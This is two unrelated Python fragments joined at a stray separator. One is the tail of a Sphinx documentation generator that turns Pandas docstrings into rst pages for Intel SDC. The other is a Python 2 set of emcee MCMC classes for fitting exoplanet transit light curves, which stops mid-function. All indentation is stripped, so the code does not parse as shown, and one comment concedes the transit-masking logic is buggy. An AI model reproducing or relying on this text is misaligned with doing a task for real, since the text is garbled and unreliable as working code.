else:
# This is the first line of ``raises`` description
param = _get_param_text(title, '') + '\n' + reindent(line, indent + 4)
new_text += param + '\n'
lines.pop(0)
if param != '' and description != '':
new_text += reindent(description, indent + 8) + '\n'
return new_text + '\n'
# Internal function. Returns correct markup for Returns section
def _reformat_returns(title, text):
lines = text.split('\n')
new_text = ''
if len(lines) == 0:
return new_text
indent = get_indent(text)
param = ''
description = ''
while len(lines) > 0:
line = lines[0]
line = line.strip()
# Check if it is continuation of parameter description from previous lines
if param != '':
# It is continuation of multi-line parameter description
description += reindent(line, indent + 4) + '\n'
else:
# This is the first line of ``return`` description
param = _get_param_text(title, '') + ' ' + line
new_text += reindent(param, indent) + '\n'
lines.pop(0)
if param != '' and description != '':
new_text += reindent(description, indent + 4) + '\n'
return new_text + '\n'
if title.strip() == 'Parameters':
return _reformat_parameters(title, text)
elif title.strip() == 'Returns' or title.strip() == 'Return':
return _reformat_returns(title, text)
elif title.strip() == 'Raises':
return _reformat_raises(title, text)
else:
return text
def generate_simple_object_doc(pandas_name, short_doc_flag=False, doc_from_pandas_flag=True, add_sdc_sections=True,
unsupported_warning=True, reformat_pandas=True):
"""
Generates documentation for Pandas object obj according to flags.
For complex objects such as modules and classes the function does not go to sub-objects,
i.e. to class attributes and sub-modules of the module.
:param pandas_name: Pandas object for which documentation to be generated.
:param short_doc_flag: Flag to indicate that only short description for the object is needed.
:param doc_from_pandas_flag: Flag to indicate that the documentation must be taken from Pandas docstring.
This docstring can be extended with Intel SDC specific sections. These are See Also, Examples,
Notes, Warning, Limitations, etc. if ``add_sdc_sections`` flag is set.
:param add_sdc_sections: Flag to indicate that extra sections of the documentation need to be taken from Intel SDC.
If ``doc_from_pandas_flag==False`` then the description section is taken from Intel SDC too. Otherwise
Intel SDC description section will be cut and Pandas API description will be used instead.
:param unsupported_warning: Flag, if ``True`` includes warning message if corresponding Intel SDC object is not
found. This indicates that given SDC method is unsupported.
:param reformat_pandas: Flag, if ``True`` re-formats Parameters section to :param: style. Needed to work around
Sphinx generator issues for Pandas Parameters section written in NumPy style
:return: Generated docstring.
"""
doc = ''
pandas_obj = get_obj(pandas_name)
if pandas_obj is None:
return doc # Empty documentation for no-object
if doc_from_pandas_flag: # Check if documentation needs to be generated from Pandas docstring
if short_doc_flag: # Check if only short description is needed
doc = get_short_description(pandas_obj) # Short description is requested
else:
# Exclude Examples, Notes, See Also, References sections
sections = split_in_sections(reindent(get_docstring(pandas_obj), 0))
while len(sections) > 0:
title, text = sections[0]
if title.strip() == '': # Description sections
doc += text + '\n\n'
sections.pop(0)
elif title.strip() == 'Examples': # Exclude Examples section
sections.pop(0)
elif title.strip() == 'Notes': # Exclude Notes section (may be too specific to Pandas)
sections.pop(0)
elif title.strip().lower() == 'see also': # Exclude See Also section (may be too specific to Pandas)
sections.pop(0)
elif title.strip() == 'References': # Exclude References section (may be too specific to Pandas)
sections.pop(0)
elif title.strip() == 'Parameters' or title.strip() == 'Raises' or title.strip() == 'Return' or \
title.strip() == 'Returns':
if reformat_pandas:
doc += reformat_pandas_params(title, text)
sections.pop(0)
else:
doc += create_heading_str(title) + '\n\n' + text + '\n\n'
sections.pop(0)
else:
doc += create_heading_str(title) + '\n\n' + text + '\n\n'
sections.pop(0)
if not add_sdc_sections:
if reformat_pandas:
return reformat(doc)
else:
return doc
# Here if additional sections from Intel SDC object needs to be added to pandas_obj docstring
sdc_obj = get_sdc_object_by_pandas_name(pandas_name)
if sdc_obj is None:
if unsupported_warning:
if reformat_pandas:
doc = reformat(doc)
if short_doc_flag:
return doc + ' **Unsupported by Intel SDC**.'
else:
return doc + '\n\n.. warning::\n This feature is currently unsupported ' \
'by Intel Scalable Dataframe Compiler\n\n'
if not short_doc_flag:
sdc_doc = get_docstring(sdc_obj)
sdc_doc = cut_sdc_dev_guide(sdc_doc)
# Cut description section from ``sdc_doc``
if is_sdc_user_guide_header(sdc_doc[0]): # First section is SDC User Guide header
sdc_doc.pop(0)
if doc_from_pandas_flag:
# Ignore description from Intel SDC, keep Pandas description only
while len(sdc_doc) > 0:
title, text = sdc_doc[0]
if title.strip() != '':
break
sdc_doc.pop(0)
indent = get_indent(doc)
for title, text in sdc_doc:
if title.strip() == '':
doc += '\n' + reindent(text, indent)
else:
doc += '\n' + reindent(create_heading_str(title), indent) + '\n' + \
reindent(text, indent) + '\n'
return reformat(doc)
def get_rst_filename(obj_name):
"""
Returns rst file name by respective object name.
:param obj_name: String, object name for which file name is constructed
:return: String, rst file name for the object being documented
"""
file_name = obj_name.replace('.', '/')
file_name = APIREF_REL_PATH + file_name + '.rst'
return file_name
def open_file_for_write(file_name):
"""
Opens file ``filename`` for writing. If necessary, creates file directories on the path.
:param file_name: Absolute or relative path that includes file name being created.
:return: File descriptor created.
"""
directory = os.path.dirname(file_name)
if len(directory) > 0 and not os.path.exists(directory):
os.makedirs(directory)
return open(file_name, 'w', encoding='utf-8')
def write_rst(file_name, docstring):
"""
Writes ``docstring`` into the file ``file_name``.
:param file_name: String, name of the file including relative or absolute path
:param docstring: String, docstring to be written in the file
"""
file = open_file_for_write(file_name)
file.write(docstring)
file.close()
def write_simple_object_rst_file(pandas_name, short_doc_flag=False, doc_from_pandas_flag=True, add_sdc_sections=True):
"""
Writes Pandas object ``pandas_name`` (e.g. 'pandas.Series.at') into rst file.
RST file has the name derived from ``pandas_name`` (e.g. 'pandas.Series.at.rst'). Additional flags are used
to control look and feel of the resulting content of the file. See :func:`generate_simple_object_doc` function
for details about these flags.
:param pandas_name: String, the name of Pandas object
:param short_doc_flag: Flag, if ``True``, write short description of the object only
:param doc_from_pandas_flag: Flag, if ``True``, derive the description from Pandas docstring for the object.
:param add_sdc_sections: Flag, if ``True``, extend the docstring with respective Intel SDC sections (if any)
"""
doc = generate_simple_object_doc(pandas_name, short_doc_flag, doc_from_pandas_flag, add_sdc_sections)
if doc is None or doc == '':
return
fname = get_rst_filename(pandas_name)
write_rst(fname, doc)
def parse_templ_rst(fname_templ):
"""
Parses input template rst file and outputs the final rst file
Template document must have the following structure:
Heading or subheading
*********************
Any text (if any)
Another heading or subheading
-----------------------------
Any text (if any)
.. currentmodule:: <module name>
.. sdc_toctree
<api1>
<api2>
<api3>
...
Any text (if any)
Any text (if any)
Another heading or subheading
-----------------------------
Any text (if any)
...
:param fname_templ:
"""
path, fname_out = os.path.split(fname_templ)
fname_out = fname_out.replace('_templ', '')
fname_out = fname_out.replace('_', '', 1)
fout = open_file_for_write(APIREF_REL_PATH + fname_out)
with open(fname_templ, 'r', encoding='utf-8') as fin:
doc = fin.readlines()
while len(doc) > 0:
# Parsing lines until ``.. sdc_toctree`` section is met
while len(doc) > 0 and not doc[0].startswith('.. sdc_toctree'):
line = doc[0]
if line.startswith('.. currentmodule::'):
current_module_name = line[19:].strip()
fout.write(line)
doc.pop(0)
if len(doc) == 0:
return
doc.pop(0) # Skipping ``.. sdc_toctree``
# Parsing the list of APIs
while len(doc) > 0 and doc[0].strip() != '':
line = doc[0]
indent = get_indent(line)
line = line.strip()
full_name = current_module_name + '.' + line
short_description = generate_simple_object_doc(full_name, short_doc_flag=True).strip()
new_line = reindent(':ref:`', indent) + line + ' <' + full_name + '>`\n' + \
reindent(short_description, indent+4) + '\n'
fout.write(new_line)
doc.pop(0)
full_description = generate_simple_object_doc(full_name, short_doc_flag=False)
f = open_file_for_write(APIREF_REL_PATH + full_name + '.rst')
f.write('.. _' + full_name + ':\n\n:orphan:\n\n')
f.write(create_heading_str(full_name, '*') + '\n\n')
f.write(full_description)
f.close()
if len(doc) == 0:
return
fout.close()
def write_class_rst_files(cls, short_doc_flag=False, doc_from_pandas_flag=True, add_sdc_sections=True):
# Currenlty not in use. Should be used for auto-documenting class methods and attributes.
for method_name, method_object in get_class_methods(cls):
write_simple_object_rst_file(get_fully_qualified_name(cls) + '.' + method_name,
short_doc_flag, doc_from_pandas_flag, add_sdc_sections)
for attr_name, attr_object in get_class_attributes(cls):
write_simple_object_rst_file(get_fully_qualified_name(cls) + '.' + attr_name,
short_doc_flag, doc_from_pandas_flag, add_sdc_sections)
def generate_api_reference():
"""
Master function for API Reference generation.
This function initializes all required data structures, and parses required templates for
Final RST files generation that looks and feels like Pandas API Reference.
"""
init_pandas_structure()
init_sdc_structure()
init_pandas_sdc_dict()
for templ_fname in APIREF_TEMPLATE_FNAMES:
parse_templ_rst(templ_fname)
if __name__ == "__main__":
generate_api_reference()
| |
import sys
import numpy as np
#import matplotlib.pyplot as plt
import emcee
import tmodtom as tmod
import time as thetime
from scipy.stats import truncnorm
from claretquadpy import claretquad
from claret4ppy import claretlimb4p
from copy import deepcopy
from numpy import random
#from bilin_interp import ld_quad
class transitemcee(object):
def __init__(self,nplanets,cadence=1625.3,
ldfileloc='/Users/tom/svn_code/tom_code/',
codedir='/Users/tom/svn_code/tom_code/'):
sys.path.append(codedir)
self.nplanets = nplanets
nmax = 1500000 #from the fortran
self._ntt = np.zeros(nplanets)
self._tobs = np.empty([self.nplanets,nmax])
self._omc = np.empty([self.nplanets,nmax])
self.cadence = cadence / 86400.
self.allow_ecc_orbit = False
self.ldfileloc = ldfileloc
self.onlytransits = False
self.tregion = 500
def get_stellar(self,teff,logg,FeH,n_ldparams=4):
"""
read in stellar parameters
inputs
teff : float
The effective temperature of the star
logg : float
the surface gravity of the star in log cgs
FeH : float
the metalicity of the star in log solar
optional
n_ldparams : int
"""
self.Teff = teff
self.logg = logg
self.FeH = FeH
if n_ldparams == 2:
#if teff < 3500 and logg >= 3.5:
if False:
#this block should never run
ldfile = self.ldfileloc + 'claret-quad-phoenix.txt'
self.ld1,self.ld2 = ld_quad(ldfile,
self.Teff,self.logg)
self.ld3 = 0.0
self.ld4 = 0.0
#elif logg < 3.5 or teff >= 3500:
if True:
ldfile = self.ldfileloc + 'claret-limb-quad.txt'
self.ld1,self.ld2 = claretquad(ldfile,
self.Teff,self.logg,self.FeH)
self.ld3 = 0.0
self.ld4 = 0.0
elif n_ldparams == 4:
ldfile = self.ldfileloc + 'claret-limb.txt'
self.ld1,self.ld2,self.ld3,self.ld4 = claretlimb4p(ldfile,
self.Teff,self.logg,self.FeH)
def open_lightcurve(self,filename,timeoffset=0.0,
normalize=False):
t = np.genfromtxt(filename).T
time = t[0] - timeoffset
if normalize:
flux = t[1] / np.median(t[1])
err = t[2] / np.median(t[1])
else:
flux = t[1]
err = t[2]
self.time = time
self.flux = flux
self.err = err
self.npt = len(time)
self._itime = np.zeros(self.npt) + self.cadence
self._datatype = np.zeros(self.npt)
def already_open(self,t1,f1,e1,timeoffset=0.0,normalize=False):
time = t1 - timeoffset
if normalize:
flux = f1 / np.median(f1)
err = e1 / np.median(f1)
else:
flux = f1
err = e1
self.time = time
self.flux = flux
self.err = err
self.npt = len(time)
self._itime = np.zeros(self.npt) + self.cadence
self._datatype = np.zeros(self.npt)
def get_rho(self,rho_vals,prior=False,rho_start=0.0,
rho_stop = 30.):
"""
inputs
rho_vals : array_like
Two parameter array with value
rho, rho_unc
prior : bool, optional
should this rho be used as a prior?
"""
self.rho_0 = rho_vals[0]
self.rho_0_unc = rho_vals[1]
self.rho_0_start = rho_start
self.rho_0_stop = rho_stop
if prior:
self.rho_prior = True
else:
self.rho_prior = False
def get_zpt(self,zpt_0):
self.zpt_0 = zpt_0
if self.zpt_0 == 0.0:
self.zpt_0 = 1.E-10
def get_sol(self,*args,**kwargs):
"""
reads the guess transit fit solution
There are 6 args for every planet
T0, period, impact paramter, rp/rs, ecosw and esinw
optional keywords, these are kept fixed (for now)
dil : float, optional
dilution
veloffset : float, optional
velocity zeropoint
rvamp : float, optional
radial velocity amplitude from doppler beaming
occ : float, optional
occultation depth
ell : float, optional
amplitude of ellipsoidal variations
alb : float, optional
geometric albedo of the planet
"""
assert len(args) == self.nplanets * 6
if 'dil' in kwargs.keys():
dil = kwargs['dil']
print ' running with dil = %s' %(dil)
else:
dil = 0.0
if 'veloffset' in kwargs.keys():
veloffset = kwargs['veloffset']
else:
veloffset = 0.0
if 'rvamp' in kwargs.keys():
rvamp = kwargs['rvamp']
else:
rvamp = 0.0
if 'occ' in kwargs.keys():
occ = kwargs['occ']
else:
occ = 0.0
if 'ell' in kwargs.keys():
ell = kwargs['ell']
else:
ell = 0.0
if 'alb' in kwargs.keys():
alb = kwargs['alb']
else:
alb = 0.0
try:
if self.zpt_0 == 0.:
self.zpt_0 = 1.E-10
except AttributeError:
self.zpt_0 = 1.E-10
self.zpt_0_unc = 1.E-6
fit_sol = np.array([self.rho_0,self.zpt_0])
for i in xrange(self.nplanets):
T0_0 = args[i*6]
per_0 = args[i*6 +1]
b_0 = args[i*6 +2]
rprs_0 = args[i*6 +3]
ecosw_0 = args[i*6 +4]
esinw_0 = args[i*6 +5]
new_params = np.array([T0_0,per_0,
b_0,rprs_0,ecosw_0,esinw_0])
fit_sol = np.r_[fit_sol,new_params]
self.fit_sol = fit_sol
self.fit_sol_0 = deepcopy(self.fit_sol)
self.fixed_sol = np.array([self.ld1,self.ld2,
self.ld3,self.ld4,
dil,veloffset,rvamp,
occ,ell,alb])
def cut_non_transit(self,ntdur=10):
#make a mask for each planet candidate
self.onlytransits = True
tregion = np.zeros(self.nplanets)
maskdat = np.zeros([self.npt,self.nplanets],dtype=bool)
for i in xrange(self.nplanets):
T0 = self.fit_sol[i*6 + 2]
per = self.fit_sol[i*6 + 3]
rho = self.fit_sol[0]
ars = self.get_ar(rho,per)
tdur_dys = (1./ars) * per * (1./np.pi)
#this is buggy because T0 is not nessessarily time of first transit
#but time of a transit. So fudge.
#subtract make T0 the first transit
time0 = np.copy(T0)
while True:
if time0 - per < self.time[0]:
break
else:
time0 = time0 - per
ntransits = int((self.time[-1] - self.time[0]) / per) + 1
t_times = np.arange(ntransits)*per + T0
#make sure the first and last transit are not excluded even if
#partially in the data
t_times = np.r_[t_times,t_times[0] - per,t_times[-1] + per]
for j in t_times:
maskdat[:,i] = np.logical_or(maskdat[:,i],
np.logical_and(
self.time < j +tdur_dys*ntdur,
self.time > j - tdur_dys*ntdur) )
tregion[i] = ntdur*tdur_dys
#create a final mask that is the OR of the
#individual masks
finmask = np.zeros(self.npt)
for i in xrange(self.nplanets):
finmask = np.logical_or(finmask,maskdat[:,i])
self.time = self.time[finmask]
self.flux = self.flux[finmask]
self.err = self.err[finmask]
self._itime = self._itime[finmask]
self._datatype = self._datatype[finmask]
self.tregion = tregion
def get_ar(self,rho,period):
""" gets a/R* from period and mean stellar density"""
G = 6.67E-11
rho_SI = rho * 1000.
tpi = 3. * np.pi
period_s = period * 86400.
part1 = period_s**2 * G * rho_SI
ar = (part1 / tpi)**(1./3.)
return ar
# def calc_model(self,fitsol):
# sol = np.zeros([8 + 10*self.nplanets])
# rho = fitsol[0]
# zpt = fitsol[1]
# ld1,ld2,ld3,ld4 = self.fixed_sol[0:4]
# dil = self.fixed_sol[4]
# veloffset = self.fixed_sol[5]
# fixed_stuff = self.fixed_sol[6:10]
# sol[0:8] = np.array([rho,ld1,ld2,ld3,ld4,
# dil,veloffset,zpt])
# for i in xrange(self.nplanets):
# sol[8+(i*10):8+(i*10)+10] = np.r_[fitsol[2+i*6:8+i*6],fixed_stuff]
# tmodout = tmod.transitmodel(self.nplanets,sol,self.time,self._itime,
# self._ntt,self._tobs,self._omc,self._datatype)
# return tmodout - 1.
# def logchi2(self,fitsol):
# rho = fitsol[0]
# if rho < 0.001 or rho > 30.:
# return -np.inf
# rprs = fitsol[np.arange(self.nplanets)*6 + 5]
# if np.any(rprs < 0.) or np.any(rprs > 0.5):
# return -np.inf
# ecosw = fitsol[np.arange(self.nplanets)*6 + 6]
# if np.any(ecosw < -1.0) or np.any(ecosw > 1.0):
# return -np.inf
# esinw = fitsol[np.arange(self.nplanets)*6 + 7]
# if np.any(esinw < -1.0) or np.any(esinw > 1.0):
# return -np.inf
# b = fitsol[np.arange(self.nplanets)*6 + 4]
# if np.any(b < 0.) or np.any(b > 1.0 + rprs):
# return -np.inf
# model_lc = self.calc_model(fitsol)
# if self.rho_prior:
# chi2prior = (self.rho_0 - rho)**2 / self.rho_0_unc**2
# else:
# chi2prior = 0.0
# chi2val = np.sum((model_lc - self.flux)**2 / self.err**2)
# chi2tot = chi2val + chi2prior
# logp = -chi2tot / 2.
# return logp
# def do_emcee(self,nwalkers,threads=16,burnin=100,fullrun=1000):
# l_var = 8
# p0 = self.get_guess(nwalkers)
# sampler = emcee.EnsembleSampler(nwalkers, l_var, self.logchi2,
# threads=threads)
# time1 = thetime.time()
# pos, prob, state = sampler.run_mcmc(p0, burnin)
# sampler.reset()
# time2 = thetime.time()
# print 'burn-in took ' + str((time2 - time1)/60.) + ' min'
# time1 = thetime.time()
# sampler.run_mcmc(pos, fullrun)
# time2 = thetime.time()
# print 'MCMC run took ' + str((time2 - time1)/60.) + ' min'
# print
# print("Mean acceptance: "
# + str(np.mean(sampler.acceptance_fraction)))
# print
# try:
# print("Autocorrelation times sampled:", fullrun / sampler.acor)
# except RuntimeError:
# print("No Autocorrelation")
# return sampler, (time2 - time1)/60.
def get_guess(self,nwalkers):
"""
pick sensible starting ranges for the guess parameters
T0, period, impact paramter, rp/rs, ecosw and esinw
"""
rho_unc = 0.001
zpt_unc = 1.E-8
T0_unc = 0.0002
per_unc = 0.00005
b_unc = 0.001
rprs_unc = 0.0001
ecosw_unc = 0.001
esinw_unc = 0.001
p0 = np.zeros([nwalkers,2+self.nplanets*6])
rho = self.fit_sol[0]
zpt = self.fit_sol[1]
start,stop = (0.0001 - rho) / rho_unc, (30.0 - rho) / rho_unc
p0[...,0] = truncnorm.rvs(start,stop
,loc=rho,scale=rho_unc,size=nwalkers)
p0[...,1] = np.random.normal(loc=zpt,scale=zpt,size=nwalkers)
for i in xrange(self.nplanets):
T0,per,b,rprs,ecosw,esinw = self.fit_sol[i*6+2:i*6 + 8]
b = 0.0
ecosw = 0.0
esinw = 0.0
p0[...,i*6+2] = np.random.normal(T0,T0_unc,size=nwalkers)
p0[...,i*6+3] = np.random.normal(per,per_unc,size=nwalkers)
start,stop = (0.0 - b) / b_unc, (0.5 - b) / b_unc
p0[...,i*6+4] = truncnorm.rvs(start,stop
,loc=b,scale=b_unc,size=nwalkers)
start,stop = (0.0 - rprs) / rprs_unc, (0.5 - rprs) / rprs_unc
p0[...,i*6+5] = truncnorm.rvs(start,stop
,loc=rprs,scale=rprs_unc,size=nwalkers)
start,stop = (0.0 - ecosw) / ecosw_unc, (0.5 - ecosw) / ecosw_unc
p0[...,i*6+6] = truncnorm.rvs(start,stop
,loc=ecosw,scale=ecosw_unc,size=nwalkers)
start,stop = (0.0 - esinw) / esinw_unc, (0.5 - esinw) / esinw_unc
p0[...,i*6+7] = truncnorm.rvs(start,stop
,loc=esinw,scale=esinw_unc,size=nwalkers)
return p0
class transitemcee_paramprior(transitemcee):
def __init__(self,nplanets,cadence=1626.3,
ldfileloc='/Users/tom/svn_code/tom_code/'):
transitemcee.__init__(self,nplanets,cadence,ldfileloc)
def get_stellar(self,teff,teff_unc,logg,logg_unc,FeH,FeH_unc,
n_ldparams=2):
"""
read in stellar parameters
inputs
teff : float
The effective temperature of the star
logg : float
the surface gravity of the star in log cgs
FeH : float
the metalicity of the star in log solar
optional
n_ldparams : int
"""
self.Teff = teff
self.Teff_unc = teff_unc
self.logg = logg
self.logg_unc = logg_unc
self.FeH = FeH
self.FeH_unc = FeH_unc
self.n_ldparams = n_ldparams
def get_sol(self,*args,**kwargs):
"""
reads the guess transit fit solution
There are 6 args for every planet
T0, period, impact paramter, rp/rs, ecosw and esinw
optional keywords, these are kept fixed (for now)
dil : float, optional
dilution
veloffset : float, optional
velocity zeropoint
rvamp : float, optional
radial velocity amplitude from doppler beaming
occ : float, optional
occultation depth
ell : float, optional
amplitude of ellipsoidal variations
alb : float, optional
geometric albedo of the planet
"""
assert len(args) == self.nplanets * 6
if 'dil' in kwargs.keys():
dil = kwargs['dil']
print ' running with dil = %s' %(dil)
else:
dil = 0.0
if 'veloffset' in kwargs.keys():
veloffset = kwargs['veloffset']
else:
veloffset = 0.0
if 'rvamp' in kwargs.keys():
rvamp = kwargs['rvamp']
else:
rvamp = 0.0
if 'occ' in kwargs.keys():
occ = kwargs['occ']
else:
occ = 0.0
if 'ell' in kwargs.keys():
ell = kwargs['ell']
else:
ell = 0.0
if 'alb' in kwargs.keys():
alb = kwargs['alb']
else:
alb = 0.0
try:
if self.zpt_0 == 0.:
self.zpt_0 = 1.E-10
except AttributeError:
self.zpt_0 = 1.E-10
self.zpt_0_unc = 1.E-6
fit_sol = np.array([self.rho_0,self.zpt_0,self.Teff,self.logg,self.FeH])
for i in xrange(self.nplanets):
T0_0 = args[i*6]
per_0 = args[i*6 +1]
b_0 = args[i*6 +2]
rprs_0 = args[i*6 +3]
ecosw_0 = args[i*6 +4]
esinw_0 = args[i*6 +5]
new_params = np.array([T0_0,per_0,
b_0,rprs_0,ecosw_0,esinw_0])
fit_sol = np.r_[fit_sol,new_params]
self.fit_sol = fit_sol
self.fit_sol_0 = deepcopy(self.fit_sol)
self.fixed_sol = np.array([
dil,veloffset,rvamp,
occ,ell,alb])
def get_guess(self,nwalkers):
"""
pick sensible starting ranges for the guess parameters
T0, period, impact paramter, rp/rs, ecosw and esinw
"""
rho_unc = 0.001
zpt_unc = 1.E-8
teff_unc = 10
logg_unc = 0.01
feh_unc = 0.01
T0_unc = 0.0002
per_unc = 0.00005
b_unc = 0.001
rprs_unc = 0.0001
ecosw_unc = 0.001
esinw_unc = 0.001
p0 = np.zeros([nwalkers,5+self.nplanets*6])
rho = self.fit_sol[0]
zpt = self.fit_sol[1]
teff = self.fit_sol[2]
logg = self.fit_sol[3]
feh = self.fit_sol[4]
start,stop = (0.0001 - rho) / rho_unc, (30.0 - rho) / rho_unc
p0[...,0] = truncnorm.rvs(start,stop
,loc=rho,scale=rho_unc,size=nwalkers)
p0[...,1] = np.random.normal(loc=zpt,scale=zpt,size=nwalkers)
start,stop = (3500. - teff) / teff_unc, (50000. - teff) / teff_unc
p0[...,2] = truncnorm.rvs(start,stop
,loc=teff,scale=teff_unc,size=nwalkers)
start,stop = (0.0 - logg) / logg_unc, (5. - logg) / logg_unc
p0[...,3] = truncnorm.rvs(start,stop
,loc=logg,scale=logg_unc,size=nwalkers)
start,stop = (-5.0 - feh) / feh_unc, (1.0 - feh) / feh_unc
p0[...,4] = truncnorm.rvs(start,stop
,loc=feh,scale=feh_unc,size=nwalkers)
for i in xrange(self.nplanets):
T0,per,b,rprs,ecosw,esinw = self.fit_sol[i*6+5:i*6 + 11]
b = 0.0
ecosw = 0.0
esinw = 0.0
p0[...,i*6+5] = np.random.normal(T0,T0_unc,size=nwalkers)
p0[...,i*6+6] = np.random.normal(per,per_unc,size=nwalkers)
start,stop = (0.0 - b) / b_unc, (0.5 - b) / b_unc
p0[...,i*6+7] = truncnorm.rvs(start,stop
,loc=b,scale=b_unc,size=nwalkers)
start,stop = (0.0 - rprs) / rprs_unc, (0.5 - rprs) / rprs_unc
p0[...,i*6+8] = truncnorm.rvs(start,stop
,loc=rprs,scale=rprs_unc,size=nwalkers)
start,stop = (0.0 - ecosw) / ecosw_unc, (0.5 - ecosw) / ecosw_unc
p0[...,i*6+9] = truncnorm.rvs(start,stop
,loc=ecosw,scale=ecosw_unc,size=nwalkers)
start,stop = (0.0 - esinw) / esinw_unc, (0.5 - esinw) / esinw_unc
p0[...,i*6+10] = truncnorm.rvs(start,stop
,loc=esinw,scale=esinw_unc,size=nwalkers)
return p0
def cut_non_transit(self,ntdur=10):
#make a mask for each planet candidate
self.onlytransits = True
tregion = np.zeros(self.nplanets)
maskdat = np.zeros([self.npt,self.nplanets],dtype=bool)
for i in xrange(self.nplanets):
T0 = self.fit_sol[i*6 + 5]
per = self.fit_sol[i*6 + 6]
rho = self.fit_sol[0]
ars = self.get_ar(rho,per)
tdur_dys = (1./ars) * per * (1./np.pi)
#this is buggy because T0 is not nessessarily time of first transit
#but time of a transit. So fudge.
#subtract make T0 the first transit
time0 = np.copy(T0)
while True:
if time0 - per < self.time[0]:
break
else:
time0 = time0 - per
ntransits = int((self.time[-1] - self.time[0]) / per) + 1
t_times = np.arange(ntransits)*per + T0
#make sure the first and last transit are not excluded even if
#partially in the data
t_times = np.r_[t_times,t_times[0] - per,t_times[-1] + per]
for j in t_times:
maskdat[:,i] = np.logical_or(maskdat[:,i],
np.logical_and(
self.time < j +tdur_dys*ntdur,
self.time > j - tdur_dys*ntdur) )
tregion[i] = ntdur*tdur_dys
#create a final mask that is the OR of the
#individual masks
finmask = np.zeros(self.npt)
for i in xrange(self.nplanets):
finmask = np.logical_or(finmask,maskdat[:,i])
self.time = self.time[finmask]
self.flux = self.flux[finmask]
self.err = self.err[finmask]
self._itime = self._itime[finmask]
self._datatype = self._datatype[finmask]
self.tregion = tregion
class transitemcee_paramprior_occ(transitemcee_paramprior):
pass
class transitemcee_fitldp(transitemcee):
def __init__(self,nplanets,cadence=1626.3,
ldfileloc='/Users/tom/svn_code/tom_code/',
codedir='/Users/tom/svn_code/tom_code/'):
transitemcee.__init__(self,nplanets,cadence,ldfileloc,codedir)
def get_stellar(self,teff,logg,FeH,
n_ldparams=2,ldp_prior=True):
"""
read in stellar parameters
inputs
teff : float
The effective temperature of the star
logg : float
the surface gravity of the star in log cgs
FeH : float
the metalicity of the star in log solar
optional
n_ldparams : int
"""
self.Teff = teff
self.logg = logg
self.FeH = FeH
self.ld1_unc = 0.1
self.ld2_unc = 0.1
self.ld3_unc = 0.1
self.ld4_unc = 0.1
if teff < 3500:
teff = 3500
self.ld1_unc = 0.2
self.ld2_unc = 0.2
if logg < 0.0:
logg = 0.0
self.ld1_unc = 0.05
self.ld2_unc = 0.05
if logg > 5.0:
logg = 5.0
self.ld1_unc = 0.05
self.ld2_unc = 0.05
if FeH < -5.0:
FeH = -5.0
self.ld1_unc = 0.05
self.ld2_unc = 0.05
if FeH > 1.0:
FeH = 1.0
self.ld1_unc = 0.05
self.ld2_unc = 0.05
if n_ldparams == 2:
ldfile = self.ldfileloc + 'claret-limb-quad.txt'
self.ld1,self.ld2 = claretquad(ldfile,
teff,logg,FeH)
self.ld3 = 0.0
self.ld4 = 0.0
if teff < 3500:
self.ld1,self.ld2 = claretquad(ldfile,
3500.,logg,FeH)
elif n_ldparams == 4:
ldfile = self.ldfileloc + 'claret-limb.txt'
self.ld1,self.ld2,self.ld3,self.ld4 = claretlimb4p(
ldfile,
self.Teff,self.logg,self.FeH)
self.ldp_prior = ldp_prior
self.n_ldparams = n_ldparams
def get_sol(self,*args,**kwargs):
"""
reads the guess transit fit solution
There are 6 args for every planet
T0, period, impact paramter, rp/rs, ecosw and esinw
optional keywords, these are kept fixed (for now)
dil : float, optional
dilution
veloffset : float, optional
velocity zeropoint
rvamp : float, optional
radial velocity amplitude from doppler beaming
occ : float, optional
occultation depth
ell : float, optional
amplitude of ellipsoidal variations
alb : float, optional
geometric albedo of the planet
"""
assert len(args) == self.nplanets * 6
if 'dil' in kwargs.keys():
dil = kwargs['dil']
print ' running with dil = %s' %(dil)
else:
dil = 0.0
if 'veloffset' in kwargs.keys():
veloffset = kwargs['veloffset']
else:
veloffset = 0.0
if 'rvamp' in kwargs.keys():
rvamp = kwargs['rvamp']
else:
rvamp = 0.0
if 'occ' in kwargs.keys():
occ = kwargs['occ']
else:
occ = 0.0
if 'ell' in kwargs.keys():
ell = kwargs['ell']
else:
ell = 0.0
if 'alb' in kwargs.keys():
alb = kwargs['alb']
else:
alb = 0.0
try:
if self.zpt_0 == 0.:
self.zpt_0 = 1.E-10
except AttributeError:
self.zpt_0 = 1.E-10
self.zpt_0_unc = 1.E-6
if self.n_ldparams == 2:
fit_sol = np.array([self.rho_0,self.zpt_0,
self.ld1,self.ld2])
elif self.n_ldparams == 4:
fit_sol = np.array([self.rho_0,self.zpt_0,
self.ld1,self.ld2,self.ld3, self.ld4])
for i in xrange(self.nplanets):
T0_0 = args[i*6]
per_0 = args[i*6 +1]
b_0 = args[i*6 +2]
rprs_0 = args[i*6 +3]
ecosw_0 = args[i*6 +4]
esinw_0 = args[i*6 +5]
new_params = np.array([T0_0,per_0,
b_0,rprs_0,ecosw_0,esinw_0])
fit_sol = np.r_[fit_sol,new_params]
self.fit_sol = fit_sol
self.fit_sol_0 = deepcopy(self.fit_sol)
self.fixed_sol = np.array([
dil,veloffset,rvamp,
occ,ell,alb])
def get_guess(self,nwalkers):
"""
pick sensible starting ranges for the guess parameters
T0, period, impact paramter, rp/rs, ecosw and esinw
"""
rho_unc = 0.1
zpt_unc = 1.E-8
ld1_unc = 0.05
ld2_unc = 0.05
ld3_unc = 0.05
ld4_unc = 0.05
T0_unc = 0.0002
per_unc = 0.00005
b_unc = 0.001
rprs_unc = 0.0001
ecosw_unc = 0.001
esinw_unc = 0.001
#p0 = np.zeros([nwalkers,4+self.nplanets*6])
if self.n_ldparams == 2:
p0 = np.zeros([nwalkers,4+self.nplanets*6+1])
elif self.n_ldparams == 4:
p0 = np.zeros([nwalkers,6+self.nplanets*6+1])
rho = self.fit_sol[0]
zpt = self.fit_sol[1]
ld1 = self.fit_sol[2]
ld2 = self.fit_sol[3]
if self.n_ldparams == 4:
ld3 = self.fit_sol[4]
ld4 = self.fit_sol[5]
addval = 2
start,stop = (0.0 - ld3) / ld3_unc, (1.0 - ld3) / ld3_unc
p0[...,4] = truncnorm.rvs(start,stop
,loc=ld3,scale=ld3_unc,size=nwalkers)
start,stop = (0.0 - ld4) / ld4_unc, (1.0 - ld4) / ld4_unc
p0[...,5] = truncnorm.rvs(start,stop
,loc=ld4,scale=ld4_unc,size=nwalkers)
else:
addval = 0
start,stop = (0.0001 - rho) / rho_unc, (30.0 - rho) / rho_unc
